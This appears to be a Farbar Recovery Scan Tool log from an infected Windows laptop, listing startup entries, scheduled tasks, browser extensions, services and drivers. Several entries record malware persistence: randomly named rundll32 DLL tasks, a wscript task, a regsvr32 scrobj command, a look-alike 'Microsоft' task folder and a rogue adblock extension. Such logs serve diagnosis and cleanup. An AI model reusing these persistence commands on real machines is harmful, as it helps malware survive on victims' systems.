HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [86291XTILANVX6O] => C:\Program Files\GQKYY7DDKJ\GQKYY7DDK.exe [1050112 2019-06-11] (G%W6R6E3) [File not signed]
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [3984576] => C:\Users\TATTOO NR\AppData\Roaming\p0uiw1bfrq3\4kunvqm1h30.exe [2384286 2019-06-11] ( ) [File not signed]
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [0M1OFGFFOSM84LS] => C:\Program Files\CZR35WZAYJ\POXIDW5BY.exe [1050112 2019-06-11] (G%W6R6E3) [File not signed]
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [0OH5BUC0EZ2FPJ5] => C:\Program Files\2O7KWFY5NN\2O7KWFY5N.exe [1050112 2019-06-11] (G%W6R6E3) [File not signed]
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\...\Run: [8502685] => C:\Users\TATTOO NR\AppData\Roaming\f3lfxrjhn5p\ebmurowmij1.exe [2384286 2019-06-11] ( ) [File not signed]
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\WINDOWS\system32\ssText3d.scr [217088 2018-04-12] (Microsoft Windows -> Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\74.0.3729.169\Installer\chrmstp.exe [2019-05-22] (Google LLC -> Google Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Mediatek Wireless Utility.lnk [2018-04-07]
ShortcutTarget: Mediatek Wireless Utility.lnk -> C:\Program Files (x86)\MediatekWiFi\Common\RaUI.exe (MEDIATEK INC. -> Mediatek Inc.) [File not signed]
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SOLIDWORKS 2018 Fast Start.lnk [2018-10-31]
ShortcutTarget: SOLIDWORKS 2018 Fast Start.lnk -> C:\Windows\Installer\{837A0B0D-F508-4088-8B05-606477DEB905}\NewShortcut2_87EDF6C81D0A4B7B84F42FE0C6A9D608.exe (Flexera Software LLC) [File not signed]
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SOLIDWORKS Background Downloader.lnk [2018-10-31]
ShortcutTarget: SOLIDWORKS Background Downloader.lnk -> C:\Program Files (x86)\Common Files\SOLIDWORKS Installation Manager\BackgroundDownloading\sldBgDwld.exe (Dassault Systemes SolidWorks Corp. -> Dassault Systèmes SolidWorks Corp.)
Startup: C:\Users\TATTOO NR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AMDGPUOptimization.lnk [2019-06-11]
ShortcutTarget: AMDGPUOptimization.lnk -> C:\ProgramData\AMDTools\AsusHidSrv.exe (Windows Corporation)
Startup: C:\Users\TATTOO NR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowsStartUpApplication.lnk [2019-06-11]
ShortcutTarget: WindowsStartUpApplication.lnk -> C:\ProgramData\WindowsTools\WindFlash.exe (Windows Corporation)
GroupPolicy: Restriction - Chrome <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {04CC6040-F480-4763-970F-F400D86AE4A4} - System32\Tasks\LIUFzeWTazYslRQqD2 => rundll32 "C:\Program Files (x86)\QWszBGwJaeOCwsfDwHR\AegGFOi.dll",#1
Task: {0B130924-726B-4296-A8FC-43DD32223C9A} - System32\Tasks\Norton Security\Norton Security Error Processor => C:\Program Files\Norton Security\Engine\22.17.2.46\SymErr.exe [101392 2019-05-25] (Symantec Corporation -> Symantec Corporation)
Task: {0BD86C50-4526-49E5-93CA-227B2C1D3DBF} - System32\Tasks\System\SystemCheck => C:\Users\TATTOO NR\AppData\Roaming\Microsoft\Windows\Helper.exe [7585280 2019-06-11] () [File not signed] <==== ATTENTION
Task: {0E0097EF-84E2-46AA-9798-CEAC4822F2BD} - System32\Tasks\ACC => C:\Program Files (x86)\Acer\Care Center\LiveUpdateChecker.exe [2920752 2017-02-21] (Acer Incorporated -> )
Task: {212D53B5-43BE-4AF6-9664-B699D3243DBD} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [26165840 2019-05-29] (Microsoft Corporation -> Microsoft Corporation)
Task: {23D87F40-A962-403E-8586-50FF5557A2B2} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [619416 2019-02-05] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {2517F52F-B34C-424E-AB42-25968827920D} - System32\Tasks\One System Care Delayed => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe [3893248 2019-06-07] () [File not signed] <==== ATTENTION
Task: {2CCF5C47-D512-4D54-8A68-D99DACF5FBC0} - System32\Tasks\iGCYEUMXJwKesSj2 => rundll32 "C:\Program Files (x86)\ucUYDxMaU\ovhJfX.dll",#1
Task: {2FF800F3-7206-4415-B218-9BBC6880B226} - System32\Tasks\One System CarePeriod => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe [3893248 2019-06-07] () [File not signed] <==== ATTENTION
Task: {3CCA81B0-EC98-4A03-9DD8-E9205718EE18} - System32\Tasks\sSQkKOKYWDiwSfhyvlN2 => rundll32 "C:\Program Files (x86)\lWHHxbcKHnQsC\QNMNpQh.dll",#1
Task: {3DB190F6-28CB-4ED2-8F11-531A1CF35DC1} - System32\Tasks\Acer Collection Application => C:\Program Files (x86)\Acer\Acer Collection\ACEStd.exe [479024 2017-05-05] (Acer Incorporated -> )
Task: {4460186B-AF17-4DB3-AEAE-3CA9FE311778} - System32\Tasks\AcerCloud => C:\ProgramData\acer\Acer Portal\launchPortal.exe [25816 2017-05-17] (Acer Incorporated -> )
Task: {5AE1CCC2-A7B9-4CB6-8125-12D82E263193} - System32\Tasks\Norton Security\Norton Security Autofix => C:\Program Files\Norton Security\Engine\22.17.2.46\SymErr.exe [101392 2019-05-25] (Symantec Corporation -> Symantec Corporation)
Task: {66741AAF-1ED2-4EB5-843D-DA5D9EED2041} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [52104 2017-05-25] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
Task: {71E7062C-BC03-4621-9912-E247F4620F57} - System32\Tasks\vCITHywpmVbAM2 => C:\WINDOWS\system32\wscript.exe "C:\ProgramData\bzughXCIBIxiSQVB\LWSbUhu.wsf"
Task: {76578927-BFDD-4A33-9148-A60E3E3BD0A2} - System32\Tasks\UbtFrameworkService => C:\Program Files\Acer\User Experience Improvement Program\Framework\TriggerFramework.exe [215856 2017-04-27] (Acer Incorporated -> TODO: <Company name>)
Task: {7A11DB60-7A74-4FD0-AAA7-B78395E6B0BF} - System32\Tasks\Acer Collection Monitor Application => C:\Program Files (x86)\Acer\Acer Collection\ACEMon.exe [417072 2017-03-09] (Acer Incorporated -> Acer Incorporated)
Task: {7B3119FD-22FB-4D16-ACCE-87E57423CECE} - System32\Tasks\Microsоft\WindowsMediaPlayerUpdate-133415446 => C:\Users\TATTOO [Argument = NR\Videos\Captures\WindowsMediaPlayer.exe]
Task: {84C41F00-2908-4441-80D0-C4A436588D1D} - System32\Tasks\AcerCMUpdateTask2.1.16258 => C:\Program Files (x86)\Acer\Amundsen\2.1.16258\AWC.exe [152880 2016-09-20] (Acer Incorporated -> )
Task: {8E42302F-801D-49A9-ACB1-83984B6F4009} - System32\Tasks\NvNgxUpdateCheckDaily_{A6B397E0-97E0-97E0-97E0-A6B397E097E0} => regsvr32 /s /n /u /i:"C:\Users\TATTOO NR\AppData\Roaming\arcuafh" scrobj
Task: {8EF85D46-A2F7-43C4-88AE-6B4E3BE7E5AF} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\sdxhelper.exe [113096 2019-06-10] (Microsoft Corporation -> Microsoft Corporation)
Task: {8FD2EF20-E0F9-400D-9A92-5E54F7872E30} - System32\Tasks\DashlaneUpgradeCheck => net [Argument = start "Dashlane Upgrade Service"]
Task: {8FF4B7EA-7A91-4108-A480-F2B83AA24164} - System32\Tasks\Quick Access => C:\Program Files\Acer\Acer Quick Access\QALauncher.exe [445744 2017-02-15] (Acer Incorporated -> Acer Incorporated)
Task: {902F608D-E7B4-49FC-A966-46EDCEB741EE} - System32\Tasks\TASKDIRFORTASKCREATE\TASKFORTASKCREATE => C:\Users\TATTOO NR\AppData\Roaming\Media\sys32.exe [0 0000-00-00] ()
Task: {92BC4D69-6960-4712-855A-6ACA27DB001F} - System32\Tasks\wVzoSdTGfzmTXt => rundll32 "C:\Program Files (x86)\OSBCtizBNrsU2\UoGvdhWJGfZXQ.dll",#1
Task: {94A860F6-81A9-4DB1-91E2-7B1386971ED5} - System32\Tasks\Software Update Application => C:\ProgramData\OEM\UpgradeTool\ListCheck.exe [473904 2017-02-15] (Acer Incorporated -> Acer Incorporated)
Task: {AACE4BD4-3138-4CC1-B831-66413EC747D8} - System32\Tasks\Remediation\AntimalwareMigrationTask => C:\Program Files\Common Files\AV\Norton Security\Upgrade.exe
Task: {B5F407B4-9FD8-490C-9539-00A6E7DF8EE5} - System32\Tasks\One System Care Monitor => C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe [1975296 2019-05-27] () [File not signed] <==== ATTENTION
Task: {BB5CC8E5-BE39-4FB7-A350-2B30DC3C0034} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesCommonX86\Microsoft Shared\Office16\sdxhelper.exe [113096 2019-06-10] (Microsoft Corporation -> Microsoft Corporation)
Task: {C7B89D3D-FA1D-43E1-B830-B08E1A4567F8} - System32\Tasks\ACCBackgroundApplication => C:\Program Files (x86)\Acer\Care Center\ACCStd.exe [4645168 2017-02-21] (Acer Incorporated -> )
Task: {CB61EE22-FD30-4FC2-8835-162B610AF227} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [1448064 2019-06-10] (Microsoft Corporation -> Microsoft Corporation)
Task: {CDF6DC74-9111-4BEF-89A7-DA0934245E67} - System32\Tasks\Power Button => C:\Program Files\Acer\Acer Quick Access\ePowerButton_NB.exe [2767664 2017-02-15] (Acer Incorporated -> Acer Incorporated)
Task: {CEE5BB38-E1C1-4804-BC57-511F2829C8EC} - System32\Tasks\User Boot Experience Task => C:\OEM\Preload\FUBService\FUBService.exe [30976 2015-05-14] (Acer Incorporated -> )
Task: {D2F288FC-78B4-47F2-A75B-D1EFCD08D4D8} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [1448064 2019-06-10] (Microsoft Corporation -> Microsoft Corporation)
Task: {D483F23E-3002-45DA-9FE8-D1672B7338B6} - System32\Tasks\ACCAgent => C:\Program Files (x86)\Acer\Care Center\LiveUpdateAgent.exe [41264 2017-02-21] (Acer Incorporated -> )
Task: {D8BC792D-F8F0-45C3-8C12-B69CBE9BCE07} - System32\Tasks\Norton WSC Integration => C:\Program Files\Norton Security\Engine\22.17.2.46\WSCStub.exe [2225296 2019-05-25] (Symantec Corporation -> Symantec Corporation)
Task: {DECF662C-6ACD-4847-9773-F16675DEAA62} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [13797712 2018-09-11] (Piriform Ltd -> Piriform Ltd)
Task: {DFE346EB-B71E-4E21-8CA3-7256C573FD16} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [26165840 2019-05-29] (Microsoft Corporation -> Microsoft Corporation)
Task: {EF9C1632-7A77-4C89-83BE-104934848542} - System32\Tasks\Norton Security\Norton Security Error Analyzer => C:\Program Files\Norton Security\Engine\22.17.2.46\SymErr.exe [101392 2019-05-25] (Symantec Corporation -> Symantec Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\One System CarePeriod.job => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe <==== ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.8.1 192.168.8.1
Tcpip\..\Interfaces\{2332afe5-1941-4ccb-81a8-cca5a88047e1}: [DhcpNameServer] 192.168.8.1 192.168.8.1
Tcpip\..\Interfaces\{401326d8-26c0-493a-a63e-bad398a973d8}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{fbf40bdb-b543-4dc1-8239-c1a24d677136}: [DhcpNameServer] 192.168.10.1

Internet Explorer:
==================
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://acer17win10.msn.com/?pc=ACTE
HKU\S-1-5-21-1314756099-2751335980-7412341-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://acer17win10.msn.com/?pc=ACTE
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2019-06-02] (Microsoft Corporation -> Microsoft Corporation)
BHO: YoutubeAdBlock -> {C31FFFC8-E607-4B43-ABE6-B98F6F84AD0F} -> C:\Program Files (x86)\cqyivUztEIE\tIzjVys.dll [2019-06-11] () [File not signed]
BHO-x32: YoutubeAdBlock -> {C31FFFC8-E607-4B43-ABE6-B98F6F84AD0F} -> C:\Program Files (x86)\cqyivUztEIE\kOI2QLWvo.dll [2019-06-11] () [File not signed]
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-06-02] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-06-02] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-06-02] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2019-06-02] (Microsoft Corporation -> Microsoft Corporation)

FireFox:
========
FF DefaultProfile: twf7p78h.default
FF ProfilePath: C:\Users\TATTOO NR\AppData\Roaming\Mozilla\Firefox\Profiles\twf7p78h.default [2019-06-11]
FF Extension: (English (US) Language Pack) - C:\Users\TATTOO NR\AppData\Roaming\Mozilla\Firefox\Profiles\twf7p78h.default\Extensions\langpack-en-US@firefox.mozilla.org.xpi [2018-12-20]
FF Extension: (Mozilla Partner Defaults) - C:\Users\TATTOO NR\AppData\Roaming\Mozilla\Firefox\Profiles\twf7p78h.default\Extensions\partnerdefaults@mozilla.com [2017-12-08] [Legacy]
FF Extension: (Acer Locale Fix) - C:\Users\TATTOO NR\AppData\Roaming\Mozilla\Firefox\Profiles\twf7p78h.default\features\{18ef1d82-648c-481c-9590-2660f6a75788}\acer-locale-fix@mozilla.org.xpi [2018-12-20] [Legacy]
FF Extension: (No Name) - C:\Program Files (x86)\Mozilla Firefox\browser\features\{97745D00-02AA-4FE4-9F1E-2AD41FCD3B49}.xpi [2019-06-11] [not signed]
FF Extension: (English (US) Language Pack) - C:\Program Files (x86)\Mozilla Firefox\distribution\extensions\langpack-en-US@firefox.mozilla.org [2017-12-09] [Legacy]
FF Extension: (Mozilla Partner Defaults) - C:\Program Files (x86)\Mozilla Firefox\distribution\extensions\partnerdefaults@mozilla.com [2017-12-09] [Legacy]
FF Plugin: 3ds.com/ComposerPlayerWebPlugin_x86_64 -> C:\PROGRA~1\SOLIDW~1\SOLIDW~3\Bin\NPCOMP~1.DLL [2018-02-26] (Dassault Systemes SE -> Dassault Systemes)
FF Plugin-x32: 3ds.com/ComposerPlayerWebPlugin -> C:\PROGRA~1\SOLIDW~1\SOLIDW~3\Bin\x86\NPCOMP~1.DLL [2018-02-26] (Dassault Systemes SE -> Dassault Systemes)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2019-04-08] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-15] (Google Inc -> Google LLC)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-15] (Google Inc -> Google LLC)

Chrome:
=======
CHR DefaultProfile: Profile 1
CHR Profile: C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Default [2019-06-11]
CHR Extension: (Slides) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-12-08]
CHR Extension: (Docs) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-12-08]
CHR Extension: (Google Drive) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-12-08]
CHR Extension: (YouTube) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-12-08]
CHR Extension: (Norton Security Toolbar) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Default\Extensions\cjabmdjcfcfdmffimndhafhblfmpjdpe [2019-03-11]
CHR Extension: (Adblocker for Youtube™) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Default\Extensions\cphpchblffbaigdopkfjjfmindinclpe [2019-06-11] [UpdateUrl:hxxps://clients88.google.com/service/update2/crx] <==== ATTENTION
CHR Extension: (Sheets) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-12-08]
CHR Extension: (Google Docs Offline) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-23]
CHR Extension: (Norton Identity Safe) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Default\Extensions\iikflkcanblccfahdhdonehdalibjnif [2017-12-08]
CHR Extension: (Chrome Web Store Payments) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-04-03]
CHR Extension: (Gmail) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-12-08]
CHR Extension: (Chrome Media Router) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-03-11]
CHR Profile: C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Guest Profile [2019-06-11]
CHR Extension: (Adblocker for Youtube™) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Guest Profile\Extensions\cphpchblffbaigdopkfjjfmindinclpe [2019-06-11] [UpdateUrl:hxxps://clients88.google.com/service/update2/crx] <==== ATTENTION
CHR Profile: C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Profile 1 [2019-06-11]
CHR Extension: (Prezentácie) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-11-12]
CHR Extension: (Dokumenty) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2018-11-12]
CHR Extension: (Disk Google) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-11-12]
CHR Extension: (YouTube) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-11-12]
CHR Extension: (Adblocker na Youtube™) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\cphpchblffbaigdopkfjjfmindinclpe [2019-06-11] [UpdateUrl:hxxps://clients88.google.com/service/update2/crx] <==== ATTENTION
CHR Extension: (Google Access Offline) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\cpkbpmniionhpjhgicbmknjngmldlijg [2019-06-11] [UpdateUrl:hxxps://clients88.google.com/service/update2/crx] <==== ATTENTION
CHR Extension: (Tabuľky) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-11-12]
CHR Extension: (Dokumenty Google v režime offline) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-11-12]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-11-12]
CHR Extension: (Gmail) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-04-08]
CHR Extension: (Chrome Media Router) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-05-24]
CHR Profile: C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\System Profile [2019-06-11]
CHR Extension: (Adblocker for Youtube™) - C:\Users\TATTOO NR\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\cphpchblffbaigdopkfjjfmindinclpe [2019-06-11] [UpdateUrl:hxxps://clients88.google.com/service/update2/crx] <==== ATTENTION
CHR HKLM\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AMD External Events Utility; C:\WINDOWS\system32\atiesrxx.exe [551800 2017-05-31] (Advanced Micro Devices, Inc. -> AMD)
R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [338312 2017-04-24] (Qualcomm Atheros -> Windows (R) Win 7 DDK provider)
R2 CCDMonitorService; C:\Program Files (x86)\Acer\AOP Framework\CCDMonitorService.exe [2272472 2017-05-17] (Acer Incorporated -> Acer Incorporated)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [11145800 2019-05-29] (Microsoft Corporation -> Microsoft Corporation)
S2 Dashlane Upgrade Service; C:\Program Files (x86)\Dashlane\Upgrade\DashlaneUpgradeService.exe [83992 2017-08-23] (Dashlane -> Dashlane, Inc.)
R2 Dolby DAX2 API Service; C:\Program Files\Dolby\Dolby DAX2\DAX2_API\DolbyDAX2API.exe [194048 2017-04-10] (Dolby Laboratories, Inc. -> Dolby Laboratories, Inc.)
S3 impi_hydra; C:\Program Files\Common Files\SolidWorks Shared\Simulation Worker Agent\hydra_service.exe [880296 2018-02-26] (Intel(R) Software Development Products -> Intel Corporation)
R2 MediatekRegistryWriter; C:\Program Files (x86)\MediatekWiFi\Common\RaRegistry.exe [401040 2014-07-31] (MEDIATEK INC. -> Mediatek Inc.)
R2 MediatekRegistryWriter64; C:\Program Files (x86)\MediatekWiFi\Common\RaRegistry64.exe [454288 2014-07-31] (MEDIATEK INC. -> Mediatek Inc.)
R2 NortonSecurity; C:\Program Files\Norton Security\Engine\22.17.2.46\NortonSecurity.exe [225608 2019-05-25] (Symantec Corporation -> Symantec Corporation)
R2 nsWscSvc; C:\Program Files\Norton Security\Engine\22.17.2.46\nsWscSvc.exe [933200 2019-05-25] (Symantec Corporation -> Symantec Corporation)
S3 QALSvc; C:\Program Files\Acer\Acer Quick Access\QALSvc.exe [461616 2017-02-15] (Acer Incorporated -> Acer Incorporated)
S3 QASvc; C:\Program Files\Acer\Acer Quick Access\QASvc.exe [506672 2017-02-15] (Acer Incorporated -> Acer Incorporated)
S3 RaMediaServer; C:\Program Files (x86)\MediatekWiFi\Common\RaMediaServer.exe [1863680 2012-07-06] (Ralink) [File not signed]
R2 RemoteSolverDispatcher; C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Flow Simulation\binCFW\remotesolverdispatcherservice.exe [264704 2018-02-26] (Mentor Graphics Corporation -> Mentor Graphics Corporation)
R2 RepetierServer; C:\Program Files (x86)\Repetier-Server\bin\RepetierServer.exe [7067496 2018-09-18] (Hot-World GmbH & Co. KG -> )
S3 SolidWorks Licensing Service; C:\Program Files (x86)\Common Files\SolidWorks Shared\Service\SolidWorksLicensing.exe [79360 2018-10-31] (SolidWorks) [File not signed]
S2 SWVisualize2018.BoostService; C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Visualize Boost\SWVisualize.BoostService.exe [59280 2018-02-26] (Dassault Systemes SolidWorks Corp. -> Dassault Systèmes)
S2 SWVisualize2018.Queue.Server; C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Visualize\SWVisualize.Queue.Server.exe [24976 2018-02-26] (Dassault Systemes SolidWorks Corp. -> Dassault Systèmes)
S3 UEIPSvc; C:\Program Files\Acer\User Experience Improvement Program\Framework\UBTService.exe [299824 2017-04-28] (Acer Incorporated -> acer)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [4413440 2019-03-14] (Microsoft Corporation -> Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [107160 2019-02-16] (Microsoft Corporation -> Microsoft Corporation)
R2 XRNADB2; C:\Program Files (x86)\Xerox Office Printing\Printer SSW2\PrintingScout\xrksmdb.exe [249344 2014-08-27] (Xerox) [File not signed]
S2 WinDefender; C:\WINDOWS\windefender.exe [X]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 amdgpio2; C:\WINDOWS\System32\drivers\amdgpio2.sys [34704 2016-08-13] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc)
R3 amdi2c; C:\WINDOWS\System32\drivers\amdi2c.sys [54128 2017-05-11] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc)
S3 amdkmcsp; C:\WINDOWS\system32\DRIVERS\amdkmcsp.sys [101232 2017-06-16] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc. )
R3 amdkmdag; C:\WINDOWS\System32\DriverStore\FileRepository\c0314721.inf_amd64_6e18cebcd5509182\atikmdag.sys [36557176 2017-05-31] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
R3 amdkmdap; C:\WINDOWS\System32\DriverStore\FileRepository\c0314721.inf_amd64_6e18cebcd5509182\atikmpag.sys [528760 2017-05-31] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
R0 amdpsp; C:\WINDOWS\System32\DRIVERS\amdpsp.sys [243048 2017-06-16] (Advanced Micro Devices Inc. -> Advanced Micro Devices, Inc. )
R3 AtiHDAudioService; C:\WINDOWS\system32\drivers\AtihdWT6.sys [110088 2017-04-25] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices)
S1 BHDrvx64; C:\Program Files\Norton Security\NortonData\22.9.2.3\Definitions\BASHDefs\20180201.001\BHDrvx64.sys [1880144 2018-01-23] (Symantec Corporation -> Symantec Corporation)
R1 ccSet_NGC; C:\WINDOWS\System32\drivers\NGCx64\1611020.02E\ccSetx64.sys [192704 2019-05-25] (Symantec Corporation -> Symantec Corporation)
S3 CH341SER_A64; C:\WINDOWS\System32\Drivers\CH341S64.SYS [59904 2015-02-06] (Microsoft Windows Hardware Compatibility Publisher -> http://www.winchiphead.com)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [507984 2018-01-04] (Symantec Corporation -> Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [152656 2018-01-04] (Symantec Corporation -> Symantec Corporation)
S3 glavcam; C:\WINDOWS\system32\DRIVERS\glavcam.sys [1711104 2018-01-09] (GENESYS LOGIC, INC. -> Windows (R) Codename Longhorn DDK provider)
R1 IDSVia64; C:\Program Files\Norton Security\NortonData\22.9.2.3\Definitions\IPSDefs\20180206.001\IDSvia64.sys [1056920 2017-12-08] (Symantec Corporation -> Symantec Corporation)
